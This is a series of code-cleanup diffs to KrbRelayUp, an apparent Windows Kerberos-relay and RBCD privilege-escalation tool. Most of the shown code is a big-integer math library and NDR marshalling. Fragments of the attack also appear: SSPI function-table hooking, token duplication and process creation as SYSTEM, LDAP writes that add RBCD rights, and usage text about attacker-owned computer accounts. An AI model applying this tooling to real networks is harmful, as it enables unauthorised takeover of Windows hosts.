@@ -567,14 +567,14 @@ namespace Mono.Math
             byte[] random = new byte[dwords << 2];
 
             rng.GetBytes(random);
-            Buffer.BlockCopy(random, 0, data, 0, (int)dwords << 2);
+            Buffer.BlockCopy(random, 0, data, 0, dwords << 2);
 
             if (remBits != 0)
             {
                 uint mask = (uint)(0x01 << (remBits - 1));
                 data[dwords - 1] |= mask;
 
-                mask = (uint)(0xFFFFFFFF >> (32 - remBits));
+                mask = 0xFFFFFFFF >> (32 - remBits);
                 data[dwords - 1] &= mask;
             }
             else
@@ -597,7 +597,7 @@ namespace Mono.Math
 
         public int BitCount()
         {
-            this.Normalize();
+            Normalize();
 
             uint value = data[length - 1];
             uint mask = 0x80000000;
@@ -624,7 +624,7 @@ namespace Mono.Math
             byte bitPos = (byte)(bitNum & 0x1F);    // get the lowest 5 bits
 
             uint mask = (uint)1 << bitPos;
-            return ((this.data[bytePos] & mask) != 0);
+            return ((data[bytePos] & mask) != 0);
         }
 
         public bool TestBit(int bitNum)
@@ -635,7 +635,7 @@ namespace Mono.Math
             byte bitPos = (byte)(bitNum & 0x1F);    // get the lowest 5 bits
 
             uint mask = (uint)1 << bitPos;
-            return ((this.data[bytePos] | mask) == this.data[bytePos]);
+            return ((data[bytePos] | mask) == data[bytePos]);
         }
 
         public void SetBit(uint bitNum)
@@ -652,13 +652,13 @@ namespace Mono.Math
         {
             uint bytePos = bitNum >> 5;             // divide by 32
 
-            if (bytePos < this.length)
+            if (bytePos < length)
             {
                 uint mask = (uint)1 << (int)(bitNum & 0x1F);
                 if (value)
-                    this.data[bytePos] |= mask;
+                    data[bytePos] |= mask;
                 else
-                    this.data[bytePos] &= ~mask;
+                    data[bytePos] &= ~mask;
             }
         }
 
@@ -825,8 +825,8 @@ namespace Mono.Math
         {
             uint val = 0;
 
-            for (uint i = 0; i < this.length; i++)
-                val ^= this.data[i];
+            for (uint i = 0; i < length; i++)
+                val ^= data[i];
 
             return (int)val;
         }
@@ -895,7 +895,7 @@ namespace Mono.Math
                     return false;
             }
             // the last step is to confirm the "large" prime with the SPP or Miller-Rabin test
-            return PrimalityTests.Test(this, Prime.ConfidenceFactor.Medium);
+            return PrimalityTests.Test(this, ConfidenceFactor.Medium);
         }
 
         #endregion
@@ -959,7 +959,7 @@ namespace Mono.Math
 
             public ModulusRing(BigInteger modulus)
             {
-                this.mod = modulus;
+                mod = modulus;
 
                 // calculate constant = b^ (2k) / m
                 uint i = mod.length << 1;
@@ -1586,7 +1586,7 @@ namespace Mono.Math
                 // Add common parts of both numbers
                 do
                 {
-                    sum = ((ulong)x[i]) + ((ulong)y[i]) + sum;
+                    sum = x[i] + ((ulong)y[i]) + sum;
                     r[i] = (uint)sum;
                     sum >>= 32;
                 } while (++i < yMax);
@@ -1727,7 +1727,7 @@ namespace Mono.Math
                 // Add common parts of both numbers
                 do
                 {
-                    sum += ((ulong)x[i]) + ((ulong)y[i]);
+                    sum += x[i] + ((ulong)y[i]);
                     r[i] = (uint)sum;
                     sum >>= 32;
                 } while (++i < yMax);
@@ -1889,7 +1889,7 @@ namespace Mono.Math
 
                 BigInteger rem = (uint)r;
 
-                return new BigInteger[] { ret, rem };
+                return new[] { ret, rem };
             }
 
             #endregion
@@ -1898,7 +1898,7 @@ namespace Mono.Math
 
             public static BigInteger[] multiByteDivide(BigInteger bi1, BigInteger bi2)
             {
-                if (Kernel.Compare(bi1, bi2) == Sign.Negative)
+                if (Compare(bi1, bi2) == Sign.Negative)
                     return new BigInteger[2] { 0, new BigInteger(bi1) };
 
                 bi1.Normalize(); bi2.Normalize();
@@ -1934,10 +1934,10 @@ namespace Mono.Math
 
                 while (j > 0)
                 {
-                    ulong dividend = ((ulong)remainder[pos] << 32) + (ulong)remainder[pos - 1];
+                    ulong dividend = ((ulong)remainder[pos] << 32) + remainder[pos - 1];
 
-                    ulong q_hat = dividend / (ulong)firstDivisorByte;
-                    ulong r_hat = dividend % (ulong)firstDivisorByte;
+                    ulong q_hat = dividend / firstDivisorByte;
+                    ulong r_hat = dividend % firstDivisorByte;
 
                     do
                     {
@@ -1946,7 +1946,7 @@ namespace Mono.Math
                             (q_hat * secondDivisorByte) > ((r_hat << 32) + remainder[pos - 2]))
                         {
                             q_hat--;
-                            r_hat += (ulong)firstDivisorByte;
+                            r_hat += firstDivisorByte;
 
                             if (r_hat < 0x100000000)
                                 continue;
@@ -1968,7 +1968,7 @@ namespace Mono.Math
                     uint uint_q_hat = (uint)q_hat;
                     do
                     {
-                        mc += (ulong)bi2.data[dPos] * (ulong)uint_q_hat;
+                        mc += bi2.data[dPos] * (ulong)uint_q_hat;
                         t = remainder[nPos];
                         remainder[nPos] -= (uint)mc;
                         mc >>= 32;
@@ -1987,7 +1987,7 @@ namespace Mono.Math
 
                         do
                         {
-                            sum = ((ulong)remainder[nPos]) + ((ulong)bi2.data[dPos]) + sum;
+                            sum = remainder[nPos] + ((ulong)bi2.data[dPos]) + sum;
                             remainder[nPos] = (uint)sum;
                             sum >>= 32;
                             dPos++; nPos++;
@@ -1995,7 +1995,7 @@ namespace Mono.Math
 
                     }
 
-                    quot.data[resultPos--] = (uint)uint_q_hat;
+                    quot.data[resultPos--] = uint_q_hat;
 
                     pos--;
                     j--;
@@ -2096,7 +2096,7 @@ namespace Mono.Math
 
                 do
                 {
-                    c += (ulong)n.data[i] * (ulong)f;
+                    c += n.data[i] * (ulong)f;
                     ret.data[i] = (uint)c;
                     c >>= 32;
                 } while (++i < n.length);
@@ -2136,7 +2136,7 @@ namespace Mono.Math
                         uint* dP = dB;
                         for (uint* yP = yB; yP < yE; yP++, dP++)
                         {
-                            mcarry += ((ulong)*xP * (ulong)*yP) + (ulong)*dP;
+                            mcarry += (*xP * (ulong)*yP) + *dP;
 
                             *dP = (uint)mcarry;
                             mcarry >>= 32;
@@ -2178,7 +2178,7 @@ namespace Mono.Math
                         uint* dP = dB;
                         for (uint* yP = yB; yP < yE && dP < dE; yP++, dP++)
                         {
-                            mcarry += ((ulong)*xP * (ulong)*yP) + (ulong)*dP;
+                            mcarry += (*xP * (ulong)*yP) + *dP;
 
                             *dP = (uint)mcarry;
                             mcarry >>= 32;
@@ -2221,7 +2221,7 @@ namespace Mono.Math
                         for (uint j = i + 1; j < dl; j++, tP2++, dP2++)
                         {
                             // k = i + j
-                            mcarry += ((ulong)bi1val * (ulong)*dP2) + *tP2;
+                            mcarry += (bi1val * (ulong)*dP2) + *tP2;
 
                             *tP2 = (uint)mcarry;
                             mcarry >>= 32;
@@ -2251,7 +2251,7 @@ namespace Mono.Math
                     tP = tt;
                     for (uint* dE = dP + dl; (dP < dE); dP++, tP++)
                     {
-                        ulong val = (ulong)*dP * (ulong)*dP + *tP;
+                        ulong val = *dP * (ulong)*dP + *tP;
                         *tP = (uint)val;
                         val >>= 32;
                         *(++tP) += (uint)val;

--- a/KrbRelayUp/Kerb/math/ConfidenceFactor.cs
+++ b/KrbRelayUp/Kerb/math/ConfidenceFactor.cs
@@ -30,8 +30,6 @@
 // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 //
 
-using System;
-
 namespace Mono.Math.Prime
 {
     /// <summary>

--- a/KrbRelayUp/Kerb/math/PrimeGeneratorBase.cs
+++ b/KrbRelayUp/Kerb/math/PrimeGeneratorBase.cs
@@ -30,8 +30,6 @@
 // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 //
 
-using System;
-
 namespace Mono.Math.Prime.Generator
 {
 

--- a/KrbRelayUp/Kerb/math/PrimeGeneratorBase.cs
+++ b/KrbRelayUp/Kerb/math/PrimeGeneratorBase.cs
@@ -53,18 +53,9 @@ namespace Mono.Math.Prime.Generator
             }
         }
 
-        public virtual PrimalityTest PrimalityTest
-        {
-            get
-            {
-                return new PrimalityTest(PrimalityTests.RabinMillerTest);
-            }
-        }
+        public virtual PrimalityTest PrimalityTest => new PrimalityTest(PrimalityTests.RabinMillerTest);
 
-        public virtual int TrialDivisionBounds
-        {
-            get { return 4000; }
-        }
+        public virtual int TrialDivisionBounds => 4000;
 
         /// <summary>
         /// Performs primality tests on bi, assumes trial division has been done.

--- a/KrbRelayUp/Kerb/math/PrimeGeneratorBase.cs
+++ b/KrbRelayUp/Kerb/math/PrimeGeneratorBase.cs
@@ -53,11 +53,11 @@ namespace Mono.Math.Prime.Generator
             }
         }
 
-        public virtual Prime.PrimalityTest PrimalityTest
+        public virtual PrimalityTest PrimalityTest
         {
             get
             {
-                return new Prime.PrimalityTest(PrimalityTests.RabinMillerTest);
+                return new PrimalityTest(PrimalityTests.RabinMillerTest);
             }
         }
 
@@ -74,7 +74,7 @@ namespace Mono.Math.Prime.Generator
         /// <remarks>The speed of this method is dependent on Confidence</remarks>
         protected bool PostTrialDivisionTests(BigInteger bi)
         {
-            return PrimalityTest(bi, this.Confidence);
+            return PrimalityTest(bi, Confidence);
         }
 
         public abstract BigInteger GenerateNewPrime(int bits);

--- a/KrbRelayUp/Kerb/math/SequentialSearchPrimeGeneratorBase.cs
+++ b/KrbRelayUp/Kerb/math/SequentialSearchPrimeGeneratorBase.cs
@@ -68,7 +68,7 @@ namespace Mono.Math.Prime.Generator
 
             int DivisionBound = TrialDivisionBounds;
             uint[] SmallPrimes = BigInteger.smallPrimes;
-            PrimalityTest PostTrialDivisionTest = this.PrimalityTest;
+            PrimalityTest PostTrialDivisionTest = PrimalityTest;
             //
             // STEP 2. Search for primes
             //

--- a/KrbRelayUp/Kerb/math/SequentialSearchPrimeGeneratorBase.cs
+++ b/KrbRelayUp/Kerb/math/SequentialSearchPrimeGeneratorBase.cs
@@ -30,8 +30,6 @@
 // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 //
 
-using System;
-
 namespace Mono.Math.Prime.Generator
 {
 

--- a/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrMarshalBuffer.cs
+++ b/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrMarshalBuffer.cs
@@ -75,7 +75,7 @@ namespace KrbRelayUp.Ndr.Marshal
         {
             if (array == null)
             {
-                array = new string[0];
+                array = Array.Empty<string>();
             }
 
             for (int i = 0; i < count; ++i)
@@ -789,7 +789,7 @@ namespace KrbRelayUp.Ndr.Marshal
             WriteInt32(0);
             if (array == null)
             {
-                array = new T[0];
+                array = Array.Empty<T>();
             }
             int var_int = (int)variance;
             if (var_int < 0)
@@ -898,7 +898,7 @@ namespace KrbRelayUp.Ndr.Marshal
             // Max Count
             if (array == null)
             {
-                array = new T[0];
+                array = Array.Empty<T>();
             }
             int var_int = (int)conformance;
             if (var_int < 0)

--- a/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrMarshalBuffer.cs
+++ b/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrMarshalBuffer.cs
@@ -145,7 +145,7 @@ namespace KrbRelayUp.Ndr.Marshal
         #endregion
 
         #region Constructors
-        public NdrMarshalBuffer() : this(new NdrDataRepresentation()
+        public NdrMarshalBuffer() : this(new NdrDataRepresentation
         {
             CharacterRepresentation = NdrCharacterRepresentation.ASCII,
             FloatingPointRepresentation = NdrFloatingPointRepresentation.IEEE,

--- a/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrMarshalBuffer.cs
+++ b/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrMarshalBuffer.cs
@@ -14,7 +14,6 @@
 
 using KrbRelayUp.Utilities.Text;
 using System;
-using System.Collections.Generic;
 using System.IO;
 using System.Text;
 

--- a/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrPickledType.cs
+++ b/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrPickledType.cs
@@ -48,7 +48,7 @@ namespace KrbRelayUp.Ndr.Marshal
             // Padding.
             reader.ReadInt32();
             Data = reader.ReadAllBytes(length);
-            DataRepresentation = new NdrDataRepresentation()
+            DataRepresentation = new NdrDataRepresentation
             {
                 IntegerRepresentation = NdrIntegerRepresentation.LittleEndian,
                 CharacterRepresentation = NdrCharacterRepresentation.ASCII,

--- a/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrUnmarshalBuffer.cs
+++ b/KrbRelayUp/Kerb/ndr/Ndr/Marshal/NdrUnmarshalBuffer.cs
@@ -701,7 +701,7 @@ namespace KrbRelayUp.Ndr.Marshal
 
         public T ReadStruct<T>() where T : INdrStructure, new()
         {
-            INdrStructure s = (INdrStructure)new T();
+            INdrStructure s = new T();
             bool conformant = false;
             if (s is INdrConformantStructure conformant_struct)
             {

--- a/KrbRelayUp/Kerb/ndr/Ndr/NdrNativeUtils.cs
+++ b/KrbRelayUp/Kerb/ndr/Ndr/NdrNativeUtils.cs
@@ -47,7 +47,7 @@ namespace KrbRelayUp.Ndr
 
             if (p == IntPtr.Zero)
             {
-                return new T[0];
+                return Array.Empty<T>();
             }
 
             IntPtr curr = p;
@@ -496,7 +496,7 @@ namespace KrbRelayUp.Ndr
         {
             if (nCount == IntPtr.Zero || pSyntaxInfo == IntPtr.Zero)
             {
-                return new MIDL_SYNTAX_INFO[0];
+                return Array.Empty<MIDL_SYNTAX_INFO>();
             }
             return reader.ReadArray<MIDL_SYNTAX_INFO>(pSyntaxInfo, nCount.ToInt32());
         }
@@ -611,7 +611,7 @@ namespace KrbRelayUp.Ndr
         {
             if (RpcProtseqEndpoint == IntPtr.Zero || RpcProtseqEndpointCount == 0)
             {
-                return new RPC_PROTSEQ_ENDPOINT[0];
+                return Array.Empty<RPC_PROTSEQ_ENDPOINT>();
             }
             return reader.ReadArray<RPC_PROTSEQ_ENDPOINT>(RpcProtseqEndpoint, RpcProtseqEndpointCount);
         }

--- a/KrbRelayUp/Kerb/ndr/Ndr/NdrNativeUtils.cs
+++ b/KrbRelayUp/Kerb/ndr/Ndr/NdrNativeUtils.cs
@@ -95,7 +95,7 @@ namespace KrbRelayUp.Ndr
 
         internal static RPC_VERSION ToRpcVersion(this Version version)
         {
-            return new RPC_VERSION() { MajorVersion = (ushort)version.Major, MinorVersion = (ushort)version.Minor };
+            return new RPC_VERSION { MajorVersion = (ushort)version.Major, MinorVersion = (ushort)version.Minor };
         }
 
         internal static int GetPrimitiveTypeSize<T>() where T : struct
@@ -487,7 +487,7 @@ namespace KrbRelayUp.Ndr
         {
             if (pTransferSyntax == IntPtr.Zero)
             {
-                return new RPC_SYNTAX_IDENTIFIER() { SyntaxGUID = NdrNativeUtils.DCE_TransferSyntax };
+                return new RPC_SYNTAX_IDENTIFIER { SyntaxGUID = NdrNativeUtils.DCE_TransferSyntax };
             }
             return reader.ReadStruct<RPC_SYNTAX_IDENTIFIER>(pTransferSyntax);
         }
@@ -518,7 +518,7 @@ namespace KrbRelayUp.Ndr
         public RPC_SYNTAX_IDENTIFIER(Guid guid, ushort major, ushort minor)
         {
             SyntaxGUID = guid;
-            SyntaxVersion = new RPC_VERSION() { MajorVersion = major, MinorVersion = minor };
+            SyntaxVersion = new RPC_VERSION { MajorVersion = major, MinorVersion = minor };
         }
     }
 

--- a/KrbRelayUp/Kerb/ndr/Ndr/NdrParser.cs
+++ b/KrbRelayUp/Kerb/ndr/Ndr/NdrParser.cs
@@ -17,14 +17,8 @@
 // the original author James Forshaw to be used under the Apache License for this
 // project.
 
-using KrbRelayUp.Utilities.Memory;
-using KrbRelayUp.Win32;
 //using NtApiDotNet.Win32.Debugger;
 using System;
-using System.Collections.Generic;
-using System.ComponentModel;
-using System.Linq;
-using System.Runtime.InteropServices;
 
 namespace KrbRelayUp.Ndr
 {

--- a/KrbRelayUp/KrbSCM.cs
+++ b/KrbRelayUp/KrbSCM.cs
@@ -38,13 +38,13 @@ namespace KrbRelayUp
             FuncAcquireCredentialsHandle DelegAcquireCredentialsHandle = new FuncAcquireCredentialsHandle(AcquireCredentialsHandleHook);
             byte[] bAcquireCredentialsHandle = BitConverter.GetBytes(Marshal.GetFunctionPointerForDelegate(DelegAcquireCredentialsHandle).ToInt64());
             int oAcquireCredentialsHandle = Marshal.OffsetOf(typeof(SecurityFunctionTable), "AcquireCredentialsHandle").ToInt32();
-            Marshal.Copy(bAcquireCredentialsHandle, 0, (IntPtr)functionTable + oAcquireCredentialsHandle, bAcquireCredentialsHandle.Length);
+            Marshal.Copy(bAcquireCredentialsHandle, 0, functionTable + oAcquireCredentialsHandle, bAcquireCredentialsHandle.Length);
 
             // Hook InitializeSecurityContext function
             FuncInitializeSecurityContext DelegInitializeSecurityContext = new FuncInitializeSecurityContext(InitializeSecurityContextHook);
             byte[] bInitializeSecurityContext = BitConverter.GetBytes(Marshal.GetFunctionPointerForDelegate(DelegInitializeSecurityContext).ToInt64());
             int oInitializeSecurityContext = Marshal.OffsetOf(typeof(SecurityFunctionTable), "InitializeSecurityContext").ToInt32();
-            Marshal.Copy(bInitializeSecurityContext, 0, (IntPtr)functionTable + oInitializeSecurityContext, bInitializeSecurityContext.Length);
+            Marshal.Copy(bInitializeSecurityContext, 0, functionTable + oInitializeSecurityContext, bInitializeSecurityContext.Length);
 
             if (String.IsNullOrEmpty(serviceCommand))
             {

--- a/KrbRelayUp/KrbSCM.cs
+++ b/KrbRelayUp/KrbSCM.cs
@@ -1,7 +1,4 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.IO;
-using System.Linq;
 using System.Runtime.InteropServices;
 using System.Text;
 

--- a/KrbRelayUp/KrbSCM.cs
+++ b/KrbRelayUp/KrbSCM.cs
@@ -379,13 +379,13 @@ namespace KrbRelayUp
         internal static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
 
         [DllImport("advapi32.dll", EntryPoint = "CreateProcessAsUser", SetLastError = true, CharSet = CharSet.Ansi, CallingConvention = CallingConvention.StdCall)]
-        private extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
+        private static extern bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
 
         [DllImport("advapi32.dll", EntryPoint = "DuplicateTokenEx")]
-        private extern static bool DuplicateTokenEx(IntPtr ExistingTokenHandle, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpThreadAttributes, int TokenType, int ImpersonationLevel, ref IntPtr DuplicateTokenHandle);
+        private static extern bool DuplicateTokenEx(IntPtr ExistingTokenHandle, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpThreadAttributes, int TokenType, int ImpersonationLevel, ref IntPtr DuplicateTokenHandle);
 
         [DllImport("kernel32.dll", EntryPoint = "CloseHandle", SetLastError = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
-        private extern static bool CloseHandle(IntPtr handle);
+        private static extern bool CloseHandle(IntPtr handle);
 
         [DllImport("advapi32")] public static extern bool SetTokenInformation(IntPtr TokenHandle, short TokenInformationClass, ref int TokenInformation, int TokenInformationLength);
 

--- a/KrbRelayUp/Program.cs
+++ b/KrbRelayUp/Program.cs
@@ -51,7 +51,6 @@ namespace KrbRelayUp
             Console.WriteLine("    -sc (--ServiceCommand)           Service command [binPath]. (default = spawn cmd.exe as SYSTEM");
 
             Console.WriteLine("");
-            Environment.Exit(0);
         }
 
         static void Main(string[] args)
@@ -61,6 +60,7 @@ namespace KrbRelayUp
             if (args.Length == 0)
             {
                 GetHelp();
+                return;
             }
 
             if (args[0].ToLower() == "system")
@@ -70,7 +70,7 @@ namespace KrbRelayUp
                     KrbSCM.RunSystemProcess(Convert.ToInt32(args[1]));
                 }
                 catch { }
-                Environment.Exit(0);
+                return;
             }
 
             // parse args
@@ -100,6 +100,7 @@ namespace KrbRelayUp
             {
                 Console.WriteLine("Must supply FQDN using [-d FQDN]");
                 GetHelp();
+                return;
             }
 
             domain = args[iDomain + 1];
@@ -161,7 +162,7 @@ namespace KrbRelayUp
                     {
                         Console.WriteLine($"[-] Could not add new computer account:");
                         Console.WriteLine($"[-] {e.Message}");
-                        Environment.Exit(0);
+                        return;
                     }
                 }
 
@@ -205,7 +206,6 @@ namespace KrbRelayUp
                 System.Threading.Thread.Sleep(1500);
 
                 KrbSCM.Run(targetSPN, serviceName, serviceCommand);
-                Environment.Exit(0);
             }
         }
 

--- a/KrbRelayUp/Program.cs
+++ b/KrbRelayUp/Program.cs
@@ -1,17 +1,8 @@
-﻿using Asn1;
-using KrbRelayUp.Asn1;
-using KrbRelayUp.Kerberos;
-using KrbRelayUp.Kerberos.PAC;
-using KrbRelayUp.lib.Interop;
 using System;
-using System.Collections.Generic;
-using System.DirectoryServices;
 using System.DirectoryServices.Protocols;
-using System.Linq;
 using System.Security.Principal;
 using System.Text;
 using System.Text.RegularExpressions;
-using System.Threading;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Program.cs
+++ b/KrbRelayUp/Program.cs
@@ -73,8 +73,6 @@ namespace KrbRelayUp
                 Environment.Exit(0);
             }
 
-            
-
             // parse args
             int iDomain = Array.FindIndex(args, s => new Regex(@"(?i)(-|--)(d|Domain)$").Match(s).Success);
             int iCreateNewComputerAccount = Array.FindIndex(args, s => new Regex(@"(?i)(-|--)(c|CreateNewComputerAccount)$").Match(s).Success);
@@ -85,7 +83,6 @@ namespace KrbRelayUp
             int iImpersonate = Array.FindIndex(args, s => new Regex(@"(?i)(-|--)(i|Impersonate)$").Match(s).Success);
             int iServiceName = Array.FindIndex(args, s => new Regex(@"(?i)(-|--)(s|ServiceName)$").Match(s).Success);
             int iServiceCommand = Array.FindIndex(args, s => new Regex(@"(?i)(-|--)(sc|ServiceCommand)$").Match(s).Success);
-
 
             if (iServiceName != -1)
                 serviceName = args[iServiceName + 1];
@@ -166,7 +163,6 @@ namespace KrbRelayUp
                         Console.WriteLine($"[-] {e.Message}");
                         Environment.Exit(0);
                     }
-
                 }
 
                 // Get Computer SID for RBCD
@@ -211,17 +207,15 @@ namespace KrbRelayUp
                 KrbSCM.Run(targetSPN, serviceName, serviceCommand);
                 Environment.Exit(0);
             }
-
-
         }
 
         public static string GetObjectSidForComputerName(LdapConnection ldapConnection, string computerName, string searchBase)
         {
             string searchFilter = $"(sAMAccountName={computerName}$)";
-            SearchRequest searchRequest = new SearchRequest(searchBase, searchFilter, System.DirectoryServices.Protocols.SearchScope.Subtree, new string[] { "DistinguishedName", "objectSid" });
+            SearchRequest searchRequest = new SearchRequest(searchBase, searchFilter, SearchScope.Subtree, "DistinguishedName", "objectSid");
             try
             {
-                var response = (SearchResponse)ldapConnection.SendRequest(searchRequest);
+                SearchResponse response = (SearchResponse)ldapConnection.SendRequest(searchRequest);
                 return (new SecurityIdentifier((byte[])response.Entries[0].Attributes["objectSid"][0], 0)).ToString();
             }
             catch (Exception e)

--- a/KrbRelayUp/Program.cs
+++ b/KrbRelayUp/Program.cs
@@ -181,7 +181,7 @@ namespace KrbRelayUp
 
                 if (!String.IsNullOrEmpty(computerPassword))
                 {
-                    string salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), computerName.ToLower(), domain.ToLower());
+                    string salt = $"{domain.ToUpper()}host{computerName.ToLower()}.{domain.ToLower()}";
                     hash = Crypto.KerberosPasswordHash(Interop.KERB_ETYPE.aes256_cts_hmac_sha1, computerPassword, salt);
                     eType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
                 }

--- a/KrbRelayUp/Program.cs
+++ b/KrbRelayUp/Program.cs
@@ -28,8 +28,8 @@ namespace KrbRelayUp
             Console.WriteLine("Usage: KrbRelayUp.exe relay -d FQDN -cn COMPUTERNAME [-c] [-cp PASSWORD | -ch NTHASH]\n");
             Console.WriteLine("    -d  (--Domain)                   FQDN of domain.");
             Console.WriteLine("    -c  (--CreateNewComputerAccount)    Create new computer account for RBCD. Will use the current authenticated user.");
-            Console.WriteLine("    -cn (--ComputerName)             Name of attacker owned computer account for RBCD. (deafult=KRBRELAYUP$ [if -c is enabled])");
-            Console.WriteLine("    -cp (--ComputerPassword)         Password of computer account for RBCD. (deafult=RANDOM [if -c is enabled])");
+            Console.WriteLine("    -cn (--ComputerName)             Name of attacker owned computer account for RBCD. (default=KRBRELAYUP$ [if -c is enabled])");
+            Console.WriteLine("    -cp (--ComputerPassword)         Password of computer account for RBCD. (default=RANDOM [if -c is enabled])");
             Console.WriteLine("    -ch (--ComputerPasswordHash)     Password NT hash of computer account for RBCD. (Optional)");
             Console.WriteLine("    -p  (--Port)                     Port for Com Server (default=12345)");
             
@@ -37,10 +37,10 @@ namespace KrbRelayUp
             Console.WriteLine("SPAWN:");
             Console.WriteLine("Usage: KrbRelayUp.exe spawn -d FQDN -cn COMPUTERNAME [-cp PASSWORD | -ch NTHASH] <-i USERTOIMPERSONATE>\n");
             Console.WriteLine("    -d  (--Domain)                   FQDN of domain.");
-            Console.WriteLine("    -cn (--ComputerName)             Name of attacker owned computer account for RBCD. (deafult=KRBRELAYUP$ [if -c is enabled])");
-            Console.WriteLine("    -cp (--ComputerPassword)         Password of computer account for RBCD. (deafult=RANDOM [if -c is enabled])");
+            Console.WriteLine("    -cn (--ComputerName)             Name of attacker owned computer account for RBCD. (default=KRBRELAYUP$ [if -c is enabled])");
+            Console.WriteLine("    -cp (--ComputerPassword)         Password of computer account for RBCD. (default=RANDOM [if -c is enabled])");
             Console.WriteLine("    -ch (--ComputerPasswordHash)     Password NT hash of computer account for RBCD. (Optional)");
-            Console.WriteLine("    -i  (--Impersonate)              User to impersonate. should be a local admininstrator in the target computer. (default=Administrator)");
+            Console.WriteLine("    -i  (--Impersonate)              User to impersonate. should be a local administrator in the target computer. (default=Administrator)");
             Console.WriteLine("    -s  (--ServiceName)              Name of the service to be created. (default=KrbSCM)");
             Console.WriteLine("    -sc (--ServiceCommand)           Service command [binPath]. (default = spawn cmd.exe as SYSTEM");
 

--- a/KrbRelayUp/Relay/Attacks/Generic.cs
+++ b/KrbRelayUp/Relay/Attacks/Generic.cs
@@ -63,7 +63,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
             Helpers.StructureArrayToPtr(mod, ptr, true);
 
             //int rest = ldap_modify_ext(ld, dn, ptr, IntPtr.Zero, IntPtr.Zero, out int pMessage);
-            int rest = Natives.ldap_modify_s(ld, dn, ptr);
+            int rest = ldap_modify_s(ld, dn, ptr);
             if ((LdapStatus)rest == LdapStatus.LDAP_SUCCESS)
             {
                 Console.WriteLine("[+] RBCD rights added successfully");
@@ -148,7 +148,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
             IntPtr pLaps = Helpers.AllocHGlobalIntPtrArray(1 + 1);
             var controlPtr = Marshal.StringToHGlobalUni("DistinguishedName");
             Marshal.WriteIntPtr(pLaps, IntPtr.Size * 0, controlPtr);
-            var search = Natives.ldap_search(
+            var search = ldap_search(
                 ld,
                 $"{Relay.domainDN}",
                 (int)LdapSearchScope.LDAP_SCOPE_SUBTREE,
@@ -158,7 +158,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
             //Console.WriteLine("[*] msgID: {0}", search);
 
             IntPtr pMessage = IntPtr.Zero;
-            var r = Natives.ldap_result(
+            var r = ldap_result(
                 ld,
                 search,
                 0,
@@ -176,7 +176,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
             var result = new List<byte[]>();
             foreach (var tempPtr in Helpers.GetPointerArray(vals))
             {
-                Natives.berval bervalue = (Natives.berval)Marshal.PtrToStructure(tempPtr, typeof(Natives.berval));
+                berval bervalue = (berval)Marshal.PtrToStructure(tempPtr, typeof(berval));
                 if (bervalue.bv_len > 0 && bervalue.bv_val != IntPtr.Zero)
                 {
                     var byteArray = new byte[bervalue.bv_len];
@@ -194,7 +194,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
 
         public static string getPropertyValue(IntPtr ld, string adObject, string property)
         {
-            var timeout = new Natives.LDAP_TIMEVAL
+            var timeout = new LDAP_TIMEVAL
             {
                 tv_sec = (int)(new TimeSpan(0, 0, 30).Ticks / TimeSpan.TicksPerSecond)
             };
@@ -229,7 +229,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
             var result = new List<byte[]>();
             foreach (var tempPtr in Helpers.GetPointerArray(vals))
             {
-                Natives.berval bervalue = (Natives.berval)Marshal.PtrToStructure(tempPtr, typeof(Natives.berval));
+                berval bervalue = (berval)Marshal.PtrToStructure(tempPtr, typeof(berval));
                 if (bervalue.bv_len > 0 && bervalue.bv_val != IntPtr.Zero)
                 {
                     var byteArray = new byte[bervalue.bv_len];

--- a/KrbRelayUp/Relay/Attacks/Generic.cs
+++ b/KrbRelayUp/Relay/Attacks/Generic.cs
@@ -47,7 +47,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
                 value
             };
             var modValuePtr = Marshal.AllocHGlobal(IntPtr.Size * 2);
-            Helpers.ByteArraysToBerValueArray(modValue.Select(_ => _ ?? new byte[0]).ToArray(), modValuePtr);
+            Helpers.ByteArraysToBerValueArray(modValue.Select(_ => _ ?? Array.Empty<byte>()).ToArray(), modValuePtr);
             List<LDAPMod> mod = new List<LDAPMod> {
                 new LDAPMod {
                     mod_op = (int)LdapModOperation.LDAP_MOD_REPLACE | (int)LdapModOperation.LDAP_MOD_BVALUES,
@@ -101,7 +101,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
                 value
             };
